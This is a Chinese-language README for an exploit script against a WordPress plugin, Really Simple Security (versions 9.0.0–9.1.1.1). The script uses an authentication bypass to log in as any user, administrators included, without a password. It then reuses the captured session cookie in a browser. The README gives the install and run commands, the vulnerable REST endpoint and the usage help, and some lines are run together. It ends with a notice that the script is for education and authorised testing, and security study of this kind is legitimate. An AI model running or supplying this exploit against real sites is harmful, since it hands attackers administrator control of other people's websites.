Really Simple Security(免费版、专业版及专业版多站点)9.0.0 - 9.1.1.1 - 身份验证绕过
该脚本利用了 WordPress 的 Really Simple Security 插件(9.0.0 - 9.1.1.1 版本)中的一个漏洞。该缺陷源于双因素认证 API 中 check_login_and_get_user 函数对错误处理不当,从而允许绕过身份验证。
利用此漏洞,攻击者可在启用双因素认证(2FA)的情况下以任意用户(例如管理员)身份登录。一旦认证成功,脚本便会使用获取到的会话 Cookie 自动启动浏览器会话。
在运行脚本之前,请先安装所需依赖:
pip install requests selenium webdriver-manager
python CVE-2024-10924.py -u http://TARGET-WEBSITE.com/
/wp-json/reallysimplessl/v1/two_fa/skip_onboarding
/wp-admin/,无需密码即可获得管理员访问权限。usage: CVE-2024-10924.py [-h] -u URL
WordPress Login Exploit | Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Authentication
Bypass
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL
此脚本仅供教育目的和授权安全评估使用。滥用此脚本可能会带来法律后果。在对任何系统进行测试之前,请务必获得适当授权。